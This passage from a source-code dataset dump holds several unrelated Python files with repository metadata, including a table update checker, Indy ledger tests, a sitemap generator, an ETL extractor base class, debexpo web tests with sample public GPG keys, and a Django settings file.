if not check_table_not_empty(table_name):
return {
'type': '日期检测',
'need_fill': True,
'fill_controller': {}
}
table_latest_date = get_latest_trade_date_from_table(table_name, column_name)
standard_latest_date = get_standard_latest_trade_date(frequency)
passed = table_latest_date == standard_latest_date
if passed == True:
return {
'type': '日期检测',
'need_fill': False,
'fill_controller': {
'latest_date': table_latest_date
}
}
else:
return {
'type': '日期检测',
'need_fill': True,
'fill_controller': {
'latest_date': table_latest_date
}
}
def manual_checker(table_name):
while True:
print(f'是否要更新表 {table_name} ? (y/n)', end=': ')
user_resp = input().lower()
if user_resp == 'y':
print(f'请输入一个早于上次更新时间的日期 (yyyymmdd)', end=': ')
latest_date = input()
return {
'type': '手动检测',
'need_fill': True,
'fill_controller': {
'latest_date': latest_date
}
}
elif user_resp == 'n':
return {
'type': '手动检测',
'need_fill': False,
'fill_controller': {}
}
else: pass
| 27.99
| 90
| 0.544837
|
4a18e9b14c50a0addcaf57bdba73d221f5b00095
| 1,314
|
py
|
Python
|
tests/functional_tests/pool/close_pool_ledger_with_valid_data_test.py
|
wYaobiz/indy-test-suite
|
7b4a3f9bb73e5830fea17a158dc0fc96ab29ac32
|
[
"Apache-2.0"
] | 1
|
2021-07-26T14:19:07.000Z
|
2021-07-26T14:19:07.000Z
|
tests/functional_tests/pool/close_pool_ledger_with_valid_data_test.py
|
wYaobiz/indy-test-suite
|
7b4a3f9bb73e5830fea17a158dc0fc96ab29ac32
|
[
"Apache-2.0"
] | null | null | null |
tests/functional_tests/pool/close_pool_ledger_with_valid_data_test.py
|
wYaobiz/indy-test-suite
|
7b4a3f9bb73e5830fea17a158dc0fc96ab29ac32
|
[
"Apache-2.0"
] | null | null | null |
from indy import pool
from utilities import utils
from utilities import common, constant
from test_scripts.functional_tests.pool.pool_test_base import PoolTestBase
import pytest
class TestClosePoolLedgerConfig(PoolTestBase):
@pytest.mark.asyncio
async def test(self):
# 1. Create pool ledger configure.
# 2. Open pool ledger.
self.pool_handle = await \
common.create_and_open_pool_ledger_for_steps(self.steps,
self.pool_name,
constant.
pool_genesis_txn_file)
# 3. Close pool ledger.
self.steps.add_step("Close pool ledger")
result = await utils.perform(self.steps, pool.close_pool_ledger,
self.pool_handle, ignore_exception=True)
# 4. Verify that pool ledger is closed successfully.
self.steps.add_step("Verify that pool ledger is closed successfully")
error_message = "Cannot close opened pool ledger"
if utils.check(self.steps, error_message,
condition=lambda: result is None):
# prevent post-condition close pool ledger again.
self.pool_handle = None
| 41.0625
| 79
| 0.592846
|
4a18e9b72f87bebf55ae46995c10589174009fca
| 736
|
py
|
Python
|
lib/generator/sitemap.py
|
vane/static-site-generator
|
14a6031dac43f04a5ede7d95dec846e619d0c8b9
|
[
"MIT"
] | null | null | null |
lib/generator/sitemap.py
|
vane/static-site-generator
|
14a6031dac43f04a5ede7d95dec846e619d0c8b9
|
[
"MIT"
] | null | null | null |
lib/generator/sitemap.py
|
vane/static-site-generator
|
14a6031dac43f04a5ede7d95dec846e619d0c8b9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import lib.helper
def generate(posts, config, output):
data = """<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd" xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
"""
for p in posts:
url = config['url']+'/'+p.url
partial = """<url>
<loc>{}</loc>
<lastmod>{}</lastmod>
</url>""".format(url, p.date.isoformat())
data += partial
data += """</urlset>"""
fpath = lib.helper.join_path(output, 'sitemap.xml')
print('generate sitemap')
lib.helper.write_file(fpath, data)
| 35.047619
| 235
| 0.63587
|
4a18ea43a2db591292baf9f946112fe8fb9ec45e
| 173
|
py
|
Python
|
tests/model_control/detailed/transf_Difference/model_control_one_enabled_Difference_ConstantTrend_Seasonal_MonthOfYear_MLP.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | null | null | null |
tests/model_control/detailed/transf_Difference/model_control_one_enabled_Difference_ConstantTrend_Seasonal_MonthOfYear_MLP.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | 1
|
2019-11-30T23:39:38.000Z
|
2019-12-01T04:34:35.000Z
|
tests/model_control/detailed/transf_Difference/model_control_one_enabled_Difference_ConstantTrend_Seasonal_MonthOfYear_MLP.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | null | null | null |
import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Difference'] , ['ConstantTrend'] , ['Seasonal_MonthOfYear'] , ['MLP'] );
| 43.25
| 95
| 0.768786
|
4a18ea5c25d07904b583c5ca7f4d3aadeb6fa286
| 384
|
py
|
Python
|
catkin_ws/build/lane_filter/catkin_generated/pkg.installspace.context.pc.py
|
YDHsieh/YDHsieh
|
f26b6a97536fc32dd3641a2493add2c974d83c13
|
[
"CC-BY-2.0"
] | null | null | null |
catkin_ws/build/lane_filter/catkin_generated/pkg.installspace.context.pc.py
|
YDHsieh/YDHsieh
|
f26b6a97536fc32dd3641a2493add2c974d83c13
|
[
"CC-BY-2.0"
] | null | null | null |
catkin_ws/build/lane_filter/catkin_generated/pkg.installspace.context.pc.py
|
YDHsieh/YDHsieh
|
f26b6a97536fc32dd3641a2493add2c974d83c13
|
[
"CC-BY-2.0"
] | null | null | null |
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "lane_filter"
PROJECT_SPACE_DIR = "/home/yard/duckietown/catkin_ws/install"
PROJECT_VERSION = "0.0.0"
| 42.666667
| 68
| 0.710938
|
4a18eb82ac049673c155079e5dbfbb05a743a450
| 69
|
py
|
Python
|
start.py
|
igna31/Wasm
|
574e2cd78f7a87762106e90b80b1cad64039f0d1
|
[
"MIT"
] | null | null | null |
start.py
|
igna31/Wasm
|
574e2cd78f7a87762106e90b80b1cad64039f0d1
|
[
"MIT"
] | null | null | null |
start.py
|
igna31/Wasm
|
574e2cd78f7a87762106e90b80b1cad64039f0d1
|
[
"MIT"
] | null | null | null |
import os
os.system("wat2wasm main.wat")
os.system("node script.js")
| 17.25
| 30
| 0.73913
|
4a18ebda93d3401192ed91866e18523a2564013f
| 56
|
py
|
Python
|
02_numpy/solutions/14_solutions.py
|
HirahTang/datascience_starter_course
|
a4429db9ae1795eaf52b795d16897466d769c40c
|
[
"CC0-1.0"
] | 3
|
2020-09-06T06:01:41.000Z
|
2020-09-23T19:03:04.000Z
|
01_numpy/solutions/14_solutions.py
|
glemaitre/smob_paristech_12_2018
|
b669206f204a3e57e71efb3dd22e2ffbc4e0a309
|
[
"CC0-1.0"
] | 4
|
2019-02-22T21:37:20.000Z
|
2019-03-12T13:20:29.000Z
|
01_numpy/solutions/14_solutions.py
|
glemaitre/smob_paristech_12_2018
|
b669206f204a3e57e71efb3dd22e2ffbc4e0a309
|
[
"CC0-1.0"
] | 5
|
2020-10-26T05:03:09.000Z
|
2022-03-24T04:22:09.000Z
|
x = np.arange(3).reshape((3, 1))
y = np.arange(3)
x + y
| 14
| 32
| 0.553571
|
4a18ec1f09b7cf2bea7fab4b64a880f179d146a6
| 5,476
|
py
|
Python
|
core/etl/extractor/base.py
|
xUndero/noc
|
9fb34627721149fcf7064860bd63887e38849131
|
[
"BSD-3-Clause"
] | 1
|
2019-09-20T09:36:48.000Z
|
2019-09-20T09:36:48.000Z
|
core/etl/extractor/base.py
|
ewwwcha/noc
|
aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb
|
[
"BSD-3-Clause"
] | null | null | null |
core/etl/extractor/base.py
|
ewwwcha/noc
|
aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# Data Extractor
# ----------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
import logging
import gzip
import os
import csv
import itertools
from collections import namedtuple
# NOC modules
from noc.core.log import PrefixLoggerAdapter
from noc.config import config
from noc.core.backport.time import perf_counter
logger = logging.getLogger(__name__)
class BaseExtractor(object):
"""
Data extractor interface. Subclasses must provide
*iter_data* method
"""
Problem = namedtuple("Problem", ["line", "is_rej", "p_class", "message", "row"])
name = None
PREFIX = config.path.etl_import
REPORT_INTERVAL = 1000
# List of rows to be used as constant data
data = []
# Suppress deduplication message
suppress_deduplication_log = False
def __init__(self, system):
self.system = system
self.config = system.config
self.logger = PrefixLoggerAdapter(logger, "%s][%s" % (system.name, self.name))
self.import_dir = os.path.join(self.PREFIX, system.name, self.name)
self.fatal_problems = []
self.quality_problems = []
def register_quality_problem(self, line, p_class, message, row):
self.quality_problems += [
self.Problem(line=line + 1, is_rej=False, p_class=p_class, message=message, row=row)
]
def register_fatal_problem(self, line, p_class, message, row):
self.fatal_problems += [
self.Problem(line=line + 1, is_rej=True, p_class=p_class, message=message, row=row)
]
def get_new_state(self):
if not os.path.isdir(self.import_dir):
self.logger.info("Creating directory %s", self.import_dir)
os.makedirs(self.import_dir)
path = os.path.join(self.import_dir, "import.csv.gz")
self.logger.info("Writing to %s", path)
return gzip.GzipFile(path, "w")
def get_problem_file(self):
if not os.path.isdir(self.import_dir):
self.logger.info("Creating directory %s", self.import_dir)
os.makedirs(self.import_dir)
path = os.path.join(self.import_dir, "import.csv.rej.gz")
self.logger.info("Writing to %s", path)
return gzip.GzipFile(path, "w")
def iter_data(self):
for row in self.data:
yield row
def filter(self, row):
return True
def clean(self, row):
return row
def extract(self):
def q(s):
if s == "" or s is None:
return ""
elif isinstance(s, unicode):
return s.encode("utf-8")
else:
return str(s)
# Fetch data
self.logger.info("Extracting %s from %s", self.name, self.system.name)
t0 = perf_counter()
data = []
n = 0
seen = set()
for row in self.iter_data():
if not self.filter(row):
continue
row = self.clean(row)
if row[0] in seen:
if not self.suppress_deduplication_log:
self.logger.error("Duplicated row truncated: %r", row)
continue
else:
seen.add(row[0])
data += [[q(x) for x in row]]
n += 1
if n % self.REPORT_INTERVAL == 0:
self.logger.info(" ... %d records", n)
dt = perf_counter() - t0
speed = n / dt
self.logger.info("%d records extracted in %.2fs (%d records/s)", n, dt, speed)
# Sort
data.sort()
# Write
f = self.get_new_state()
writer = csv.writer(f)
writer.writerows(data)
f.close()
if self.fatal_problems or self.quality_problems:
self.logger.warning(
"Detect problems on extracting, fatal: %d, quality: %d",
len(self.fatal_problems),
len(self.quality_problems),
)
self.logger.warning("Line num\tType\tProblem string")
for p in self.fatal_problems:
self.logger.warning(
"Fatal problem, line was rejected: %s\t%s\t%s" % (p.line, p.p_class, p.message)
)
for p in self.quality_problems:
self.logger.warning(
"Data quality problem in line: %s\t%s\t%s" % (p.line, p.p_class, p.message)
)
# Dump problem to file
try:
f = self.get_problem_file()
writer = csv.writer(f, delimiter=";")
for p in itertools.chain(self.quality_problems, self.fatal_problems):
writer.writerow(
[str(c).encode("utf-8") for c in p.row]
+ [
"Fatal problem, line was rejected"
if p.is_rej
else "Data quality problem"
]
+ [p.message.encode("utf-8")]
)
except IOError as e:
self.logger.error("Error when saved problems %s", e)
finally:
f.close()
else:
self.logger.info("No problems detected")
| 34.658228
| 99
| 0.524105
|
4a18ec2609f32193792343235dc303cf02506279
| 14,574
|
py
|
Python
|
debexpo/tests/functional/test_my.py
|
jadonk/debexpo
|
a022160492e40cd02bafc413a3cb009551fd6f8d
|
[
"MIT"
] | null | null | null |
debexpo/tests/functional/test_my.py
|
jadonk/debexpo
|
a022160492e40cd02bafc413a3cb009551fd6f8d
|
[
"MIT"
] | null | null | null |
debexpo/tests/functional/test_my.py
|
jadonk/debexpo
|
a022160492e40cd02bafc413a3cb009551fd6f8d
|
[
"MIT"
] | 2
|
2017-01-20T23:08:40.000Z
|
2019-08-13T20:30:00.000Z
|
from debexpo.tests import TestController, url
from debexpo.lib import constants
from debexpo.model import meta
from debexpo.model.users import User
from debexpo.model.user_countries import UserCountry
import md5
class TestMyController(TestController):
_LOW_STRENGTH_GPGKEY = """-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
mQENBEwmV4wBCADCbdBf65H0r13XfVVncCc9pW7XkDYuKD8locXY48IdKVQRKK97
lJUZv7Ys/nx1QTTux/S7ldhQS2Op4pA86uEQOnynmM2S5uePIslbkRKGnfcfUYdE
9Ij7S0+ZIafr2MUdehFLuPhCH9ddepA5rSLfgVfMAUpwyZ+/VZOCxczLntOWhTqH
xcN4aHJ7M6EXixH4uOe+hL2PeNw1LGN/ESXgEsPuJkYnKQb6XYFGFb08WyiJ7AXZ
JMuajajTw626U2rsqoi4HNHFifGm3K2+htR5V9gStdF7CxmCAgGyQ+/vhqMAv6zv
HLWWLbSIUOftAT6zHcu/DI9yWESe1WH6hayBABEBAAG0HVRlc3QgdXNlciA8ZW1h
aWxAZXhhbXBsZS5jb20+iQE4BBMBAgAiBQJMJleMAhsDBgsJCAcDAgYVCAIJCgsE
FgIDAQIeAQIXgAAKCRAKG4hEZ1gmHq1kCACOmW8SuVYSDIhAHWmlA9Ch4QIPsCMt
9FazOHN72Gr1gB8rdUJ0qGzkOiP349sjSPqVfHz9NX830ng2QvFl0hiVCdtUlERn
ijgBUGu0nPIpZH0UskWVXthndL3twmGtfIxwzsZEWeOrmRg24q4PMBqIOA1SNowk
Ck14LkmR65Ds9a/KS23Mnd5YoH+NDB5fABXU0vgdn6il9tJhYYJPSvssj0AoF620
h9VAJ+/qpCNxmIZBa6NhDcyOoFg0i5nPo4qJRx7e1KmApGjFdW9c/Rz8pBD3v5iQ
dfkC6NRhQVoWMzVPv7RiDuC0Ig7ub1QZ8waSNDW2uwLLqwM9bRNmedY2uQENBEwm
V4wBCACw8DO6P7tVTaYlhqffAPMpJE6O9yjqz+3LDJCXJhPD+js8y5P/6i8QA80K
F2jXpphp+d/iqMbIpp+p2w2OpoF6mbc/Frf3Jjx+4pL5lwWzoicdGvxdjDeXYmCc
zI9AxderVEh4sokN9B6i/1dG9EOpkkbQ+gt9xP1Wbc4oi+03TvjEA1s+nToEkSgy
dk2Xg69IgRBGyP8+x/Yzi5pWZrfGES0/Ui6+hfiJY6fYcLnW3mWFuJ9DZdx0JRmY
mKqzorfmnHqYkUcJEKBSP6NjS2A3+SfCyZYBCFkDOZFY1zp7YtDkMTV4/vvSXBdt
/oZNVztZk8C2n9TQve4My6kPoWfzABEBAAGJAR8EGAECAAkFAkwmV4wCGwwACgkQ
ChuIRGdYJh64QQf+KXt6/VqrjYymGvKtOdufepJpBIoUehztZxJ+QSe+eL4ttrme
BPtS964reKahaP8K77rowdBtEdOCXhFc5wLSHTNqsLB2lC3y3pzEotfxa2pyO7jG
2Boy8TIj5a6ixA1nwEwPgX6RkZwnGCn17wQzTV8y8OV8ei7z/so6VHkndRVOt9O+
x7HPR7QKPp2p/JtwP6xJUtZgaDKvBpK4rISqv7MiSHljIa4sq7wfdHw8zJ8ZTtYv
2USGdIn3QtoVRN+fsGzs2rRWK6Cc1AgNqhLgna+qagAq9hB3u52G9tjAlx2MD7yD
ABRL0EeYuGCJYJRQsw8e8JuRSaVGwfotqkIHtQ==
=PXiv
-----END PGP PUBLIC KEY BLOCK-----
"""
_LOW_STRENGTH_GPG_ID = '2048R/6758261E'
_HIGH_STRENGTH_GPGKEY = """-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.12 (GNU/Linux)
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
=fw7J
-----END PGP PUBLIC KEY BLOCK-----
"""
_HIGH_STRENGTH_GPG_ID = '4096R/AC4ABA99'
def setUp(self):
self._setup_models()
self._setup_example_user()
self._setup_example_countries()
def tearDown(self):
self._remove_example_user()
self._remove_example_countries()
def test_index(self):
response = self.app.get(url(controller='my', action='index'))
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('login')))
self.assertEquals(response.session['path_before_login'], url('my'))
response = self.app.post(url('login'), self._AUTHDATA)
response = self.app.get(url(controller='my', action='index'))
self.assertEquals(response.status_int, 200)
self.assertTrue('<a href="%s">' % (url('logout')) in response)
# test user with country
user = meta.session.query(User).filter(
User.email=='email@example.com').one()
user.country = meta.session.query(UserCountry).filter(
UserCountry.name=='Germany').one()
meta.session.commit()
response = self.app.get(url(controller='my', action='index'))
self.assertEquals(response.status_int, 200)
self.assertTrue('<a href="%s">' % (url('logout')) in response)
# test DD user
user = meta.session.query(User).filter(
User.email=='email@example.com').one()
user.status = constants.USER_STATUS_DEVELOPER
meta.session.commit()
response = self.app.get(url(controller='my', action='index'))
self.assertEquals(response.status_int, 200)
self.assertTrue('<a href="%s">' % (url('logout')) in response)
# test DM user
user = meta.session.query(User).filter(
User.email=='email@example.com').one()
user.status = constants.USER_STATUS_MAINTAINER
meta.session.commit()
response = self.app.get(url(controller='my', action='index'))
self.assertEquals(response.status_int, 200)
self.assertTrue('<a href="%s">' % (url('logout')) in response)
# test handling of deleted user
self._remove_example_user()
response = self.app.get(url(controller='my', action='index'))
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('login')))
def test__gpg(self):
response = self.app.post(url('my'), {'form': 'gpg'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('login')))
response = self.app.post(url('login'), self._AUTHDATA)
user = meta.session.query(User).filter(User.email=='email@example.com').one()
self.assertEquals(user.gpg, None)
# upload GPG key with low strength
response = self.app.post(url('my'), {'form': 'gpg',
'delete_gpg': 0,
'commit': 'submit'},
upload_files = [('gpg', 'mykey.asc',
self._LOW_STRENGTH_GPGKEY)])
self.assertEquals(response.status_int, 200)
low_strength_msg = 'Key strength unacceptable in Debian Keyring. The minimum required key strength is'
self.assertTrue(low_strength_msg in response)
user = meta.session.query(User).filter(User.email=='email@example.com').one()
self.assertEquals(user.gpg, None)
# upload GPG key with high strength
response = self.app.post(url('my'), {'form': 'gpg',
'delete_gpg': 0,
'commit': 'submit'},
upload_files = [('gpg', 'mykey.asc',
self._HIGH_STRENGTH_GPGKEY)])
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('my')))
user = meta.session.query(User).filter(User.email=='email@example.com').one()
self.assertEquals(user.gpg, self._HIGH_STRENGTH_GPGKEY)
# test whether index page contains GPG delete link
response = self.app.get(url(controller='my', action='index'))
self.assertEquals(response.status_int, 200)
self.assertTrue('<a href="%s">' % (url('logout')) in response)
self.assertTrue(self._HIGH_STRENGTH_GPG_ID in response)
# delete GPG key
response = self.app.post(url('my'), {'form': 'gpg',
'delete_gpg': 1,
'commit': 'submit',
'gpg': ''})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('my')))
user = meta.session.query(User).filter(User.email=='email@example.com').one()
self.assertEquals(user.gpg, None)
def test__details(self):
response = self.app.post(url('my'), {'form': 'details'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('login')))
response = self.app.post(url('login'), self._AUTHDATA)
response = self.app.post(url('my'), {'form': 'details',
'name': '',
'email': 'email2@example.com',
'commit': 'submit'})
self.assertEquals(response.status_int, 200)
self.assertEquals(len(response.lxml.xpath('//input[@id="name" and @class="error"]')),
1)
response = self.app.post(url('my'), {'form': 'details',
'name': 'Test user2',
'email': 'email2@example.com',
'commit': 'submit'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('my')))
user = meta.session.query(User).filter(User.email=='email@example.com').first()
self.assertEquals(user, None)
user = meta.session.query(User).filter(User.email=='email2@example.com').one()
self.assertEquals(user.name, 'Test user2')
meta.session.delete(user)
meta.session.commit()
def test__password(self):
response = self.app.post(url('my'), {'form': 'password'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('login')))
response = self.app.post(url('login'), self._AUTHDATA)
response = self.app.post(url('my'), {'form': 'password',
'password_current': 'password',
'password_new': 'newpassword',
'password_confirm': 'newpassword',
'commit': 'submit'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('my')))
user = meta.session.query(User).filter(
User.email=='email@example.com').filter(
User.password==md5.new('newpassword').hexdigest()).one()
self.assertEquals(user.name, 'Test user')
def test__other_details(self):
response = self.app.post(url('my'), {'form': 'other_details'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('login')))
response = self.app.post(url('login'), self._AUTHDATA)
# test set ircnick
response = self.app.post(url('my'), {'form': 'other_details',
'country': '',
'ircnick': 'tester',
'jabber': '',
'commit': 'submit'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('my')))
user = meta.session.query(User).filter(User.email=='email@example.com').one()
self.assertEquals(user.ircnick, 'tester')
# test DM switch
response = self.app.post(url('my'), {'form': 'other_details',
'country': -1,
'ircnick': 'tester',
'jabber': '',
'status': 1,
'commit': 'submit'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('my')))
user = meta.session.query(User).filter(User.email=='email@example.com').one()
self.assertEquals(user.status, constants.USER_STATUS_MAINTAINER)
def test__invalid_form(self):
response = self.app.post(url('my'), {'form': 'invalid'})
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('login')))
response = self.app.post(url('login'), self._AUTHDATA)
response = self.app.post(url('my'), {'form': 'invalid'})
self.assertEquals(response.status_int, 200)
self.assertTrue('<a href="%s">' % url('logout') in response)
| 53.189781
| 110
| 0.68485
|
4a18ecaf7e91c71a2171f99ee0428cf43f275a01
| 3,085
|
py
|
Python
|
wolff/settings.py
|
hanztura/wolff
|
d1fc568cd54453714f2ea61f5e99a58cc109ef65
|
[
"MIT"
] | 2
|
2022-01-21T15:29:20.000Z
|
2022-01-21T17:42:30.000Z
|
wolff/settings.py
|
hanztura/wolff
|
d1fc568cd54453714f2ea61f5e99a58cc109ef65
|
[
"MIT"
] | null | null | null |
wolff/settings.py
|
hanztura/wolff
|
d1fc568cd54453714f2ea61f5e99a58cc109ef65
|
[
"MIT"
] | 1
|
2020-04-14T09:36:25.000Z
|
2020-04-14T09:36:25.000Z
|
"""
Django settings for wolff project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'gbxv2l4190sg&lpr5uq2bvauhipo^bi@(k*3=tm%odemuu!izq'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'wolff.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'wolff.wsgi.application'
# Database
